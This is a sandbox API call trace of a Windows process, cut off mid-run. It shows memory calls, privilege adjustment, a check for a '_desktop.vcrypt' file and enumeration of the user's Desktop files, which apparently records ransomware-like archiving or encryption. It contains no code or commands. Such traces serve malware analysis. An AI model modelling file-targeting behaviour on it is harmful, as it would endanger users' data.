[0057.869] malloc (_Size=0xc) returned 0x27f3a0 [0057.869] malloc (_Size=0x4) returned 0x27d710 [0057.869] malloc (_Size=0x4) returned 0x27d740 [0057.869] free (_Block=0x0) [0057.869] malloc (_Size=0xc) returned 0x27f3b8 [0057.869] malloc (_Size=0x4) returned 0x27d890 [0057.869] malloc (_Size=0x8) returned 0x27d8a0 [0057.869] free (_Block=0x27d740) [0057.869] malloc (_Size=0x20) returned 0x27f2b8 [0057.869] free (_Block=0x27d720) [0057.869] malloc (_Size=0xc) returned 0x27f3d0 [0057.869] malloc (_Size=0xa) returned 0x27f400 [0057.869] malloc (_Size=0xc) returned 0x27f418 [0057.869] free (_Block=0x27d8a0) [0057.869] malloc (_Size=0xc) returned 0x27f3e8 [0057.869] malloc (_Size=0xa) returned 0x27f4a8 [0057.869] malloc (_Size=0x10) returned 0x27f4d8 [0057.869] free (_Block=0x27f418) [0057.869] malloc (_Size=0xc) returned 0x27f418 [0057.869] malloc (_Size=0xa) returned 0x27f4f0 [0057.869] malloc (_Size=0x18) returned 0x27f7c0 [0057.869] free (_Block=0x27f4d8) [0057.869] free (_Block=0x27f2b8) [0057.869] malloc (_Size=0x8) returned 0x27d8a0 [0057.869] malloc (_Size=0x8) returned 0x27d720 [0057.869] wcscmp (_String1="*", _String2="*") returned 0 [0057.870] malloc (_Size=0x18) returned 0x27f2b8 [0057.870] malloc (_Size=0x6) returned 0x27d740 [0057.870] malloc (_Size=0x2) returned 0x27d8b0 [0057.870] malloc (_Size=0x4) returned 0x27d8c0 [0057.870] free (_Block=0x0) [0057.870] free (_Block=0x27d720) [0057.870] free (_Block=0x27d8a0) [0057.870] malloc (_Size=0x8) returned 0x27d8a0 [0057.870] malloc (_Size=0x8) returned 0x27d720 [0057.870] malloc (_Size=0xa) returned 0x27f4d8 [0057.870] free (_Block=0x27d8a0) [0057.870] wcscmp (_String1="*", _String2="*") returned 0 [0057.963] malloc (_Size=0x18) returned 0x27f7e0 [0057.963] malloc (_Size=0xa) returned 0x27f508 [0057.964] malloc (_Size=0x2) returned 0x27d8a0 [0057.964] malloc (_Size=0x8) returned 0x27d8d0 [0057.964] free (_Block=0x27d8c0) [0057.964] free (_Block=0x27d720) [0057.964] free (_Block=0x27f4d8) [0057.964] malloc (_Size=0x8) returned 0x27d720 [0057.964] malloc (_Size=0x8) returned 0x27d8c0 [0057.964] malloc (_Size=0xa) returned 0x27f4d8 [0057.964] free (_Block=0x27d8c0) [0057.964] wcscmp (_String1=".tar", _String2="*") returned 1 [0057.964] malloc (_Size=0x18) returned 0x27f800 [0057.964] malloc (_Size=0x8) returned 0x27d8c0 [0057.964] malloc (_Size=0xa) returned 0x27f520 [0057.964] malloc (_Size=0xc) returned 0x27f538 [0057.964] free (_Block=0x27d8d0) [0057.964] free (_Block=0x27f4d8) [0057.964] free (_Block=0x27d720) [0057.964] malloc (_Size=0x8) returned 0x27d720 [0057.964] malloc (_Size=0x8) returned 0x27d8d0 [0057.964] malloc (_Size=0xa) returned 0x27f4d8 [0057.964] free (_Block=0x27d8d0) [0057.964] wcscmp (_String1=".tar", _String2="*") returned 1 [0057.964] malloc (_Size=0x18) returned 0x27f820 [0057.964] malloc (_Size=0x8) returned 0x27d8d0 [0057.964] malloc (_Size=0xa) returned 0x27f550 [0057.964] malloc (_Size=0x10) returned 0x27f568 [0057.964] free (_Block=0x27f538) [0057.964] free (_Block=0x27f4d8) [0057.965] free (_Block=0x27d720) [0057.965] malloc (_Size=0x8) returned 0x27d720 [0057.965] malloc (_Size=0x8) returned 0x27d8e0 [0057.965] malloc (_Size=0xa) returned 0x27f4d8 [0057.965] free (_Block=0x27d8e0) [0057.965] wcscmp (_String1=".tar", _String2="*") returned 1 [0057.965] malloc (_Size=0x18) returned 0x27f840 [0057.965] malloc (_Size=0x8) returned 0x27d8e0 [0057.965] malloc (_Size=0xa) returned 0x27f538 [0057.965] malloc (_Size=0x18) returned 0x27f860 [0057.965] free (_Block=0x27f568) [0057.965] free (_Block=0x27f4d8) [0057.965] free (_Block=0x27d720) [0057.965] free (_Block=0x27f4f0) [0057.965] free (_Block=0x27f418) [0057.965] free (_Block=0x27f4a8) [0057.965] free (_Block=0x27f3e8) [0057.965] free (_Block=0x27f400) [0057.965] free (_Block=0x27f3d0) [0057.965] free (_Block=0x27d890) [0057.965] free (_Block=0x27f3b8) [0057.965] free (_Block=0x27d710) [0057.965] free (_Block=0x27f3a0) [0057.965] free (_Block=0x27f7c0) [0057.965] free (_Block=0x27d820) [0057.966] free (_Block=0x27f430) [0057.966] free (_Block=0x27d810) [0057.966] free (_Block=0x27f358) [0057.966] free (_Block=0x27d800) [0057.966] free (_Block=0x27f460) [0057.966] free (_Block=0x27f490) [0057.966] free (_Block=0x27f478) [0057.966] free (_Block=0x27d750) [0057.966] free (_Block=0x27f448) [0057.966] free (_Block=0x27f7a0) [0057.966] free (_Block=0x27f710) [0057.966] free (_Block=0x27f6e0) [0057.966] malloc (_Size=0x8) returned 0x27d750 [0057.966] malloc (_Size=0x4) returned 0x27d800 [0057.966] free (_Block=0x0) [0057.966] malloc (_Size=0x3) returned 0x27d810 [0057.966] malloc (_Size=0x3c) returned 0x27f6e0 [0057.966] malloc (_Size=0xa) returned 0x27f448 [0057.966] malloc (_Size=0x14) returned 0x27f7a0 [0057.966] malloc (_Size=0x18) returned 0x27f7c0 [0057.966] malloc (_Size=0x6) returned 0x27d820 [0057.966] malloc (_Size=0x2) returned 0x27d710 [0057.967] malloc (_Size=0x18) returned 0x27f880 [0057.967] malloc (_Size=0xa) returned 0x27f478 [0057.967] malloc (_Size=0x2) returned 0x27d890 [0057.967] malloc (_Size=0x18) returned 0x1c80060 [0057.968] malloc (_Size=0x8) returned 0x27d720 [0057.968] malloc (_Size=0xa) returned 0x27f490 [0057.968] malloc (_Size=0x18) returned 0x1c80080 [0057.968] malloc (_Size=0x8) returned 0x27d8f0 [0057.968] malloc (_Size=0xa) returned 0x27f460 [0057.968] malloc (_Size=0x18) returned 0x1c800a0 [0057.968] malloc (_Size=0x8) returned 0x27d900 [0057.968] malloc (_Size=0xa) returned 0x27f358 [0057.968] malloc (_Size=0x4) returned 0x27d910 [0057.968] malloc (_Size=0x8) returned 0x27d920 [0057.968] malloc (_Size=0x3) returned 0x27d930 [0057.968] malloc (_Size=0x8) returned 0x27d940 [0057.968] free (_Block=0x27d880) [0057.968] free (_Block=0x27d810) [0057.968] free (_Block=0x27d750) [0057.968] free (_Block=0x27d800) [0057.968] free (_Block=0x27f538) [0057.968] free (_Block=0x27d8e0) [0057.968] free (_Block=0x27f840) [0057.968] free (_Block=0x27f550) [0057.968] free (_Block=0x27d8d0) [0057.968] free (_Block=0x27f820) [0057.969] free (_Block=0x27f520) [0057.969] free (_Block=0x27d8c0) [0057.969] free (_Block=0x27f800) [0057.969] free (_Block=0x27d8a0) [0057.969] free (_Block=0x27f508) [0057.969] free (_Block=0x27f7e0) [0057.969] free (_Block=0x27d8b0) [0057.969] free (_Block=0x27d740) [0057.969] free (_Block=0x27f2b8) [0057.969] free (_Block=0x27f860) [0057.969] free (_Block=0x27f4c0) [0057.969] malloc (_Size=0x8) returned 0x27d740 [0057.969] malloc (_Size=0xa) returned 0x27f4c0 [0057.969] free (_Block=0x27d740) [0057.969] malloc (_Size=0x8) returned 0x27d740 [0057.969] malloc (_Size=0x8) returned 0x27d8b0 [0057.969] malloc (_Size=0xa) returned 0x27f508 [0057.969] free (_Block=0x27d740) [0057.969] malloc (_Size=0x8) returned 0x27d740 [0057.969] malloc (_Size=0x20) returned 0x27f2b8 [0057.969] free (_Block=0x27d740) [0057.969] malloc (_Size=0xc) returned 0x27f520 [0057.969] malloc (_Size=0xa) returned 0x27f550 [0057.969] malloc (_Size=0x4) returned 0x27d740 [0057.969] free (_Block=0x0) [0057.969] free (_Block=0x27f2b8) [0057.969] malloc (_Size=0x8) returned 0x27d8a0 [0057.970] free (_Block=0x27d8a0) [0057.970] malloc (_Size=0x8) returned 0x27d8a0 [0057.970] malloc (_Size=0x8) returned 0x27d8c0 [0057.970] malloc (_Size=0xa) returned 0x27f538 [0057.970] free (_Block=0x27d8a0) [0057.970] malloc (_Size=0x18) returned 0x1c800c0 [0057.970] malloc (_Size=0xa) returned 0x27f430 [0057.970] malloc (_Size=0x2) returned 0x27d8a0 [0057.970] malloc (_Size=0x4) returned 0x27d8d0 [0057.970] free (_Block=0x0) [0057.970] free (_Block=0x27d8c0) [0057.970] free (_Block=0x27f538) [0057.970] free (_Block=0x0) [0057.970] free (_Block=0x27f550) [0057.970] free (_Block=0x27f520) [0057.970] free (_Block=0x27d740) [0057.970] free (_Block=0x27d8b0) [0057.970] free (_Block=0x27f508) [0057.970] malloc (_Size=0x8) returned 0x27d8b0 [0057.970] malloc (_Size=0x4) returned 0x27d740 [0057.970] free (_Block=0x0) [0057.970] malloc (_Size=0x3c) returned 0x27f7e0 [0057.970] malloc (_Size=0xa) returned 0x27f508 [0057.970] malloc (_Size=0x4) returned 0x27d8c0 [0057.970] malloc (_Size=0x18) returned 0x1c800e0 [0057.970] malloc (_Size=0xa) returned 0x27f520 [0057.970] malloc (_Size=0x2) returned 0x27d8e0 [0057.970] malloc (_Size=0x4) returned 0x27d800 [0057.970] malloc (_Size=0x8) returned 0x27d750 [0057.970] malloc (_Size=0xc) returned 0x27f550 [0057.970] free (_Block=0x27d940) [0057.970] free (_Block=0x0) [0057.970] free (_Block=0x27d8b0) [0057.970] free (_Block=0x27d740) [0057.970] free (_Block=0x27d8a0) [0057.971] free (_Block=0x27f430) [0057.971] free (_Block=0x1c800c0) [0057.971] free (_Block=0x27d8d0) [0057.971] free (_Block=0x27f4c0) [0057.971] malloc (_Size=0x8) returned 0x27d8d0 [0057.971] wcscmp (_String1="*", _String2="*") returned 0 [0057.971] wcscmp (_String1=".tar", _String2="*") returned 1 [0057.971] wcscmp (_String1="Users", _String2="..") returned 1 [0057.971] wcscmp (_String1="Users", _String2=".") returned 1 [0057.971] wcscmp (_String1="5p5NrGJn0jS HALPmcxz", _String2="..") returned 1 [0057.971] wcscmp (_String1="5p5NrGJn0jS HALPmcxz", _String2=".") returned 1 [0057.971] wcscmp (_String1="Desktop", _String2="..") returned 1 [0057.971] wcscmp (_String1="Desktop", _String2=".") returned 1 [0057.971] wcscmp (_String1="*", _String2="..") returned -1 [0057.971] wcscmp (_String1="*", _String2=".") returned -1 [0057.971] free (_Block=0x1c80b40) [0057.971] free (_Block=0x27f658) [0057.971] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", lpFindFileData=0x22efe0 | out: lpFindFileData=0x22efe0*(dwFileAttributes=0x5020726f, ftCreationTime.dwLowDateTime=0x6f6c7661, ftCreationTime.dwHighDateTime=0x77c6e36c, ftLastAccessTime.dwLowDateTime=0x77f71089, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x270194, ftLastWriteTime.dwHighDateTime=0x270000, nFileSizeHigh=0x1c81fe0, nFileSizeLow=0x27ff60, dwReserved0=0x6a000a, dwReserved1=0x9, cFileName="ၩ矷\x01", cAlternateFileName="㊱\x13￾￿矆矆\x05")) returned 0xffffffff [0057.972] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", lpFindFileData=0x22efe0 | out: lpFindFileData=0x22efe0*(dwFileAttributes=0x5020726f, ftCreationTime.dwLowDateTime=0x6f6c7661, ftCreationTime.dwHighDateTime=0x77c6e36c, ftLastAccessTime.dwLowDateTime=0x77f71089, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x270194, ftLastWriteTime.dwHighDateTime=0x270000, nFileSizeHigh=0x1c81fe0, nFileSizeLow=0x27ff60, dwReserved0=0x6a000a, dwReserved1=0x9, cFileName="ၩ矷\x01", cAlternateFileName="㊱\x13￾￿矆矆\x05")) returned 0xffffffff [0057.972] free (_Block=0x1c80f88) [0057.972] free (_Block=0x1c80bb0) [0057.972] GetCurrentProcess () returned 0xffffffff [0057.972] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x22f298 | out: TokenHandle=0x22f298*=0x80) returned 1 [0057.972] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x22f28c | out: lpLuid=0x22f28c*(LowPart=0x8, HighPart=0)) returned 1 [0057.973] AdjustTokenPrivileges (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x22f288*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0057.973] GetLastError () returned 0x0 [0057.973] CloseHandle (hObject=0x80) returned 1 [0057.973] malloc (_Size=0x8) returned 0x1c80bb0 [0057.973] fputs (in: _Str="Scanning the drive:", _File=0x77032920 | out: _File=0x77032920) returned 0 [0057.975] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0057.976] malloc (_Size=0x6) returned 0x1c80bc0 [0057.976] free (_Block=0x1c80a70) [0057.976] malloc (_Size=0x4) returned 0x1c80a70 [0057.976] free (_Block=0x0) [0057.976] malloc (_Size=0x4) returned 0x1c80be0 [0057.976] free (_Block=0x0) [0057.976] malloc (_Size=0xc) returned 0x27f6b8 [0057.976] malloc (_Size=0x4e) returned 0x27ff30 [0057.976] malloc (_Size=0x4) returned 0x1c80bf0 [0057.976] free (_Block=0x0) [0057.976] malloc (_Size=0x4e) returned 0x1c80de0 [0057.976] free (_Block=0x1c80a80) [0057.976] GetTickCount () returned 0x1146a96 [0057.976] strlen (_Str="0") returned 0x1 [0057.976] malloc (_Size=0x10) returned 0x27f400 [0057.976] free (_Block=0x1c80a90) [0057.976] malloc (_Size=0x5) returned 0x1c80a90 [0057.977] free (_Block=0x1c80af0) [0057.977] malloc (_Size=0x4e) returned 0x1c80f00 [0057.977] free (_Block=0x1c80ac0) [0057.977] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0057.977] malloc (_Size=0x27) returned 0x272c10 [0057.977] free (_Block=0x1c80ab0) [0057.977] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchWideChar=38, lpMultiByteStr=0x272c10, cbMultiByte=38, lpDefaultChar=0x22f108, lpUsedDefaultChar=0x22f0f4 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\'", lpUsedDefaultChar=0x22f0f4) returned 38 [0057.977] malloc (_Size=0x50) returned 0x1c80f58 [0057.977] free (_Block=0x27f400) [0057.977] fputs (in: _Str=" 0M Scan C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", _File=0x77032920 | out: _File=0x77032920) returned 0 [0057.978] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0057.978] malloc (_Size=0x32) returned 0x1c80fb0 [0057.978] free (_Block=0x1c80aa0) [0057.978] malloc (_Size=0x6) returned 0x1c80aa0 [0057.978] free (_Block=0x1c80ad0) [0057.978] malloc (_Size=0x4e) returned 0x1c80ff0 [0057.978] free (_Block=0x1c80ae0) [0057.978] malloc (_Size=0x8) returned 0x1c80ae0 [0057.978] malloc (_Size=0x4e) returned 0x1c81048 [0057.978] free (_Block=0x1c80ae0) [0057.978] malloc (_Size=0x80) returned 0x1c810a0 [0057.978] free (_Block=0x1c81048) [0057.978] malloc (_Size=0x8) returned 0x1c80ae0 [0057.978] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x22eeec | out: lpFindFileData=0x22eeec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x7772ee18, cFileName=".", cAlternateFileName="")) returned 0x477b38 [0057.978] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1c80f50, dwReserved1=0xb, cFileName="..", cAlternateFileName="")) returned 1 [0057.979] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ca2c40, ftCreationTime.dwHighDateTime=0x1d5db7f, ftLastAccessTime.dwLowDateTime=0xe3634a00, ftLastAccessTime.dwHighDateTime=0x1d5d94a, ftLastWriteTime.dwLowDateTime=0xe3634a00, ftLastWriteTime.dwHighDateTime=0x1d5d94a, nFileSizeHigh=0x0, nFileSizeLow=0xfe40, dwReserved0=0x1c80f50, dwReserved1=0xb, cFileName="47Upt ff5iyL.avi", cAlternateFileName="47UPTF~1.AVI")) returned 1 [0057.979] malloc (_Size=0x22) returned 0x1c80e38 [0057.979] free (_Block=0x1c80ae0) [0057.979] malloc (_Size=0x22) returned 0x1c81048 [0057.979] malloc (_Size=0xc) returned 0x27f400 [0057.979] malloc (_Size=0x22) returned 0x1c81128 [0057.979] malloc (_Size=0x4) returned 0x1c80ae0 [0057.979] free (_Block=0x0) [0057.979] malloc (_Size=0x4) returned 0x1c80ad0 [0057.980] malloc (_Size=0xc) returned 0x27f688 [0057.980] malloc (_Size=0x22) returned 0x1c81158 [0057.980] free (_Block=0x1c81158) [0057.980] free (_Block=0x27f688) [0057.980] free (_Block=0x1c80ad0) [0057.980] malloc (_Size=0x8) returned 0x1c80ad0 [0057.980] malloc (_Size=0x22) returned 0x1c81158 [0057.980] free (_Block=0x1c80ad0) [0057.980] malloc (_Size=0x50) returned 0x1c81188 [0057.980] malloc (_Size=0x22) returned 0x1c811e0 [0057.980] malloc (_Size=0x4) returned 0x1c80ad0 [0057.980] free (_Block=0x0) [0057.980] free (_Block=0x0) [0057.980] free (_Block=0x0) [0057.980] free (_Block=0x1c81158) [0057.980] free (_Block=0x1c81128) [0057.980] free (_Block=0x27f400) [0057.980] free (_Block=0x1c80ae0) [0057.980] free (_Block=0x1c81048) [0057.980] free (_Block=0x1c80e38) [0057.980] malloc (_Size=0x8) returned 0x1c80ae0 [0057.980] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83122110, ftCreationTime.dwHighDateTime=0x1d5e577, ftLastAccessTime.dwLowDateTime=0xe28d7e90, ftLastAccessTime.dwHighDateTime=0x1d5dcdb, ftLastWriteTime.dwLowDateTime=0xe28d7e90, ftLastWriteTime.dwHighDateTime=0x1d5dcdb, nFileSizeHigh=0x0, nFileSizeLow=0x5853, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="8v1Sb42C0-_SO.xls", cAlternateFileName="8V1SB4~1.XLS")) returned 1 [0057.980] malloc (_Size=0x24) returned 0x1c80e38 [0057.980] free (_Block=0x1c80ae0) [0057.980] malloc (_Size=0x24) returned 0x1c81048 [0057.981] malloc (_Size=0xc) returned 0x27f400 [0057.981] malloc (_Size=0x24) returned 0x1c81128 [0057.981] malloc (_Size=0x4) returned 0x1c80ae0 [0057.981] free (_Block=0x0) [0057.981] malloc (_Size=0x4) returned 0x1c80ab0 [0057.981] malloc (_Size=0xc) returned 0x27f688 [0057.981] malloc (_Size=0x24) returned 0x1c81158 [0057.981] free (_Block=0x1c81158) [0057.981] free (_Block=0x27f688) [0057.981] free (_Block=0x1c80ab0) [0057.981] malloc (_Size=0x8) returned 0x1c80ab0 [0057.981] malloc (_Size=0x24) returned 0x1c81158 [0057.981] free (_Block=0x1c80ab0) [0057.981] malloc (_Size=0x50) returned 0x1c81210 [0057.981] malloc (_Size=0x24) returned 0x1c81268 [0057.981] malloc (_Size=0x8) returned 0x1c80ab0 [0057.981] free (_Block=0x1c80ad0) [0057.981] free (_Block=0x0) [0057.981] free (_Block=0x0) [0057.981] free (_Block=0x1c81158) [0057.981] free (_Block=0x1c81128) [0057.981] free (_Block=0x27f400) [0057.981] free (_Block=0x1c80ae0) [0057.981] free (_Block=0x1c81048) [0057.982] free (_Block=0x1c80e38) [0057.982] malloc (_Size=0x8) returned 0x1c80ae0 [0057.982] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a2e450, ftCreationTime.dwHighDateTime=0x1d5e476, ftLastAccessTime.dwLowDateTime=0x776a9c0, ftLastAccessTime.dwHighDateTime=0x1d5e3e9, ftLastWriteTime.dwLowDateTime=0x776a9c0, ftLastWriteTime.dwHighDateTime=0x1d5e3e9, nFileSizeHigh=0x0, nFileSizeLow=0x17daa, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="8ZRp Yo.mp4", cAlternateFileName="8ZRPYO~1.MP4")) returned 1 [0057.982] malloc (_Size=0x18) returned 0x1c800c0 [0057.982] free (_Block=0x1c80ae0) [0057.982] malloc (_Size=0x18) returned 0x1c801c0 [0057.982] malloc (_Size=0xc) returned 0x27f400 [0057.982] malloc (_Size=0x18) returned 0x1c80220 [0057.982] malloc (_Size=0x4) returned 0x1c80ae0 [0057.982] free (_Block=0x0) [0057.982] malloc (_Size=0x4) returned 0x1c80ad0 [0057.982] malloc (_Size=0xc) returned 0x27f688 [0057.982] malloc (_Size=0x18) returned 0x1c80240 [0057.982] free (_Block=0x1c80240) [0057.982] free (_Block=0x27f688) [0057.982] free (_Block=0x1c80ad0) [0057.982] malloc (_Size=0x8) returned 0x1c80ad0 [0057.982] malloc (_Size=0x18) returned 0x1c80240 [0057.982] free (_Block=0x1c80ad0) [0057.982] malloc (_Size=0x50) returned 0x1c81048 [0057.982] malloc (_Size=0x18) returned 0x1c80260 [0057.982] malloc (_Size=0xc) returned 0x27f688 [0057.983] free (_Block=0x1c80ab0) [0057.983] free (_Block=0x0) [0057.983] free (_Block=0x0) [0057.983] free (_Block=0x1c80240) [0057.983] free (_Block=0x1c80220) [0057.983] free (_Block=0x27f400) [0057.983] free (_Block=0x1c80ae0) [0057.983] free (_Block=0x1c801c0) [0057.983] free (_Block=0x1c800c0) [0057.983] malloc (_Size=0x8) returned 0x1c80ae0 [0057.983] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb086900, ftCreationTime.dwHighDateTime=0x1d5e2bd, ftLastAccessTime.dwLowDateTime=0xee4cc050, ftLastAccessTime.dwHighDateTime=0x1d5d9d0, ftLastWriteTime.dwLowDateTime=0xee4cc050, ftLastWriteTime.dwHighDateTime=0x1d5d9d0, nFileSizeHigh=0x0, nFileSizeLow=0x1676d, dwReserved0=0x77c7387a, dwReserved1=0x77c6e36c, cFileName="buFx.bmp", cAlternateFileName="")) returned 1 [0057.983] malloc (_Size=0x12) returned 0x1c800c0 [0057.983] free (_Block=0x1c80ae0) [0057.983] malloc (_Size=0x12) returned 0x1c801c0 [0057.983] malloc (_Size=0xc) returned 0x27f400 [0057.983] malloc (_Size=0x12) returned 0x1c80220 [0057.983] malloc (_Size=0x4) returned 0x1c80ae0 [0057.983] free (_Block=0x0) [0057.983] malloc (_Size=0x4) returned 0x1c80ab0 [0057.983] malloc (_Size=0xc) returned 0x27f6a0 [0057.983] malloc (_Size=0x12) returned 0x1c80240 [0057.983] free (_Block=0x1c80240) [0057.983] free (_Block=0x27f6a0) [0057.983] free (_Block=0x1c80ab0) [0057.984] malloc (_Size=0x8) returned 0x1c80ab0 [0057.984] malloc (_Size=0x12) returned 0x1c80240 [0057.984] free (_Block=0x1c80ab0) [0057.984] malloc (_Size=0x50) returned 0x1c81128 [0057.984] malloc (_Size=0x12) returned 0x1c802a0 [0057.984] malloc (_Size=0x10) returned 0x27f6a0 [0057.984] free (_Block=0x27f688) [0057.984] free (_Block=0x0) [0057.984] free (_Block=0x0) [0057.984] free (_Block=0x1c80240) [0057.984] free (_Block=0x1c80220) [0057.984] free (_Block=0x27f400) [0057.984] free (_Block=0x1c80ae0) [0057.984] free (_Block=0x1c801c0) [0057.984] free (_Block=0x1c800c0) [0057.984] malloc (_Size=0x8) returned 0x1c80ae0 [0057.984] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xc, dwReserved1=0x77c6e36c, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0057.984] malloc (_Size=0x18) returned 0x1c800c0 [0057.984] free (_Block=0x1c80ae0) [0057.984] malloc (_Size=0x18) returned 0x1c801c0 [0057.984] malloc (_Size=0xc) returned 0x27f400 [0057.984] malloc (_Size=0x18) returned 0x1c80220 [0057.984] malloc (_Size=0x4) returned 0x1c80ae0 [0057.984] free (_Block=0x0) [0057.984] malloc (_Size=0x4) returned 0x1c80ab0 [0057.984] malloc (_Size=0xc) returned 0x27f688 [0057.984] malloc (_Size=0x18) returned 0x1c80240 [0057.984] free (_Block=0x1c80240) [0057.984] free (_Block=0x27f688) [0057.985] free (_Block=0x1c80ab0) [0057.985] malloc (_Size=0x8) returned 0x1c80ab0 [0057.985] malloc (_Size=0x18) returned 0x1c80240 [0057.985] free (_Block=0x1c80ab0) [0057.985] malloc (_Size=0x50) returned 0x1c81298 [0057.985] malloc (_Size=0x18) returned 0x1c802c0 [0057.985] malloc (_Size=0x18) returned 0x1c80280 [0057.985] free (_Block=0x27f6a0) [0057.985] free (_Block=0x0) [0057.985] free (_Block=0x0) [0057.985] free (_Block=0x1c80240) [0057.985] free (_Block=0x1c80220) [0057.985] free (_Block=0x27f400) [0057.985] free (_Block=0x1c80ae0) [0057.985] free (_Block=0x1c801c0) [0057.985] free (_Block=0x1c800c0) [0057.985] malloc (_Size=0x8) returned 0x1c80ae0 [0057.985] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3f137d0, ftCreationTime.dwHighDateTime=0x1d5d7ac, ftLastAccessTime.dwLowDateTime=0x7d8ac310, ftLastAccessTime.dwHighDateTime=0x1d5de55, ftLastWriteTime.dwLowDateTime=0x7d8ac310, ftLastWriteTime.dwHighDateTime=0x1d5de55, nFileSizeHigh=0x0, nFileSizeLow=0xf08c, dwReserved0=0x12a, dwReserved1=0x77c6e36c, cFileName="FJg6m_dnHXJPIeQU.pps", cAlternateFileName="FJG6M_~1.PPS")) returned 1 [0057.985] malloc (_Size=0x2a) returned 0x1c80e38 [0057.985] free (_Block=0x1c80ae0) [0057.985] malloc (_Size=0x2a) returned 0x1c812f0 [0057.985] malloc (_Size=0xc) returned 0x27f400 [0057.985] malloc (_Size=0x2a) returned 0x1c81328 [0057.985] malloc (_Size=0x4) returned 0x1c80ae0 [0057.985] free (_Block=0x0) [0057.986] malloc (_Size=0x4) returned 0x1c80ab0 [0057.986] malloc (_Size=0xc) returned 0x27f6a0 [0057.986] malloc (_Size=0x2a) returned 0x1c81360 [0057.986] free (_Block=0x1c81360) [0057.986] free (_Block=0x27f6a0) [0057.986] free (_Block=0x1c80ab0) [0057.986] malloc (_Size=0x8) returned 0x1c80ab0 [0057.986] malloc (_Size=0x2a) returned 0x1c81360 [0057.986] free (_Block=0x1c80ab0) [0057.986] malloc (_Size=0x50) returned 0x1c813b0 [0057.986] malloc (_Size=0x2a) returned 0x1c82398 [0057.986] free (_Block=0x0) [0057.986] free (_Block=0x0) [0057.986] free (_Block=0x1c81360) [0057.986] free (_Block=0x1c81328) [0057.986] free (_Block=0x27f400) [0057.986] free (_Block=0x1c80ae0) [0057.986] free (_Block=0x1c812f0) [0057.986] free (_Block=0x1c80e38) [0057.987] malloc (_Size=0x8) returned 0x1c80ae0 [0057.987] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77a87d0, ftCreationTime.dwHighDateTime=0x1d5e21c, 